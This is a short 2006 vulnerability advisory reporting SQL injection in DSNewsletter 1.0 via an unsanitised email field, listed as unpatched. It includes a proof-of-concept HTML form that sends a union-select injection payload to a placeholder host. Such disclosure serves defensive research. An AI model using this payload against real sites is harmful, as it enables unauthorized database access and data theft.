SQL Injection Vulnerability in DSNewsletter
Summary
- Vulnerability
- SQL Injection Vulnerability in DSNewsletter
- Discovered
- 2006.03.12
- Last Update
- 2006.03.23 Exploitation code published
- ID
- EV0097
- CVE
- CVE-2006-1237
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- DSNewsletter (http://dsportal.uw.hu/)
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in DSNewsletter (http://dsportal.uw.hu/) script.
Vulnerable scripts:
include/sub.php
include/confirm.php
include/unconfirm.php
Variable $email isn't properly sanitized before being used in the SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
SQL Injection example:
<form action=http://[host]/dsnews/index.php?open=newsletter method=post>
<input name=email value="asd' union select 1,2,3,4,5/*">
<input name=choice value=sub>
<input type=submit name=submit value=Send>
</form>
Solution.
Solution for "SQL Injection Vulnerability in DSNewsletter" is not available. Check vendor's website for updates.